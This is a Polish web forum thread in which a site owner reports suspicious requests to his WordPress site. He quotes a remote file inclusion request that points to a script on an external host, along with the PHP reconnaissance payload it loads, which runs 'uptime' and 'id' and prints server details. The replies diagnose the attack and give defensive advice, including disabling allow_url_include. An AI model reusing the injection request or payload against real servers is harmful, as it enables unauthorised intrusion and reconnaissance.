Dziwne zapytania?

[Tomasz Fiedoruk 98]

Od paru dni obserwuje dziwne zapytania na swoją stronę w postaci:

 

adresstrony//DON3/applications/don3_requiem.don3app/don3_requiem.php?app_path=http://www.fingerxs.eu/modules/sistem.txt?

 

A ten plik tekstowy zawiera:

 

<?
echo "ALBANIA<br>";
$alb = @php_uname();
$alb2 = system(uptime);
$alb3 = system(id);
$alb4 = @getcwd();
$alb5 = getenv("SERVER_SOFTWARE");
$alb6 = phpversion();
$alb7 = $_SERVER['SERVER_NAME'];
$alb8 = gethostbyname($SERVER_ADDR);
$alb9 = get_current_user();
$os = @PHP_OS;
echo "os: $os<br>";
echo "uname -a: $alb<br>";
echo "uptime: $alb2<br>";
echo "id: $alb3<br>";
echo "pwd: $alb4<br>";
echo "user: $alb9<br>";
echo "phpv: $alb6<br>";
echo "SoftWare: $alb5<br>";
echo "ServerName: $alb7<br>";
echo "ServerAddr: $alb8<br>";
echo "UNITED ALBANIANS aka ALBOSS PARADISE<br>";
exit;
?>

 

Macie jakiś pomysł o co w tym chodzi?

[MiSi3kK 16]

Próbują includować pliki z zewnętrznego serwera i sprawdzić dane dot. tego Twojego. Pewnie szukają dziur, żeby coś napsuć.

 

Zablokuj w php.ini opcję includowania z zewnątrz jeśli jeszcze jest taka możliwość. Dodatkowo możesz zblokować połączenia wychodzące na port 80 i 443 (najlepiej zablokować wszystkie wychodzące poza tymi potrzebnymi)

 

Jeśli to Twój skrypt to sprawdź czy nie zapomniałeś o filtrowaniu wejścia, a jeśli to skrypt czyjś i dziura istnieje to najlepiej to zgłoś twórcom.

[xorg 693]

Zablokuj w php.ini opcję includowania z zewnątrz jeśli jeszcze jest taka możliwość.

Gdzie to jest? Bo w php.ini coś nie mogę znaleźć :/

[GLOBUS 1]

Nic dziwnego ...

 

http://milw0rm.com/exploits/5715

 

allow_url_include = Off

[Tomasz Fiedoruk 98]

Wysłałem do abuse sieci.

 

Trochę myląca jest ta domena, bo niby coś od zabezpieczeń?

 

Skrypt to WP 2.5.1, może jakaś nowa dziura się szykuje :/